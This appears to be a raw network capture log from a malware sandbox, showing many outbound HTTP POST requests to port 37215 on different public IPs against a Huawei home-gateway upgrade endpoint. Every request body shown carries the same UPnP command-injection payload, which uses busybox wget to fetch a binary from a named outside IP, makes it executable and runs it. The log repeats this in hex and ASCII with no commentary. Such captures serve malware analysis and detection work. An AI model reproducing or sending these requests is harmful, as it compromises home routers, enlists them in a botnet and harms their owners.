                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              670192.168.2.1549596168.226.240.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224793911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              671192.168.2.1534872122.167.242.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224793911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              672192.168.2.1558120197.30.20.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224895000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              673192.168.2.1547690138.75.100.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224900961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              674192.168.2.1557554190.94.47.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224944115 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              675192.168.2.1537626157.198.201.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224996090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              676192.168.2.1554038156.203.97.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224997997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              677192.168.2.1544828138.162.11.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224996090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              678192.168.2.1557812186.137.115.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224997997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              679192.168.2.154452631.54.248.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225028992 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              680192.168.2.154978494.178.42.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.225030899 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
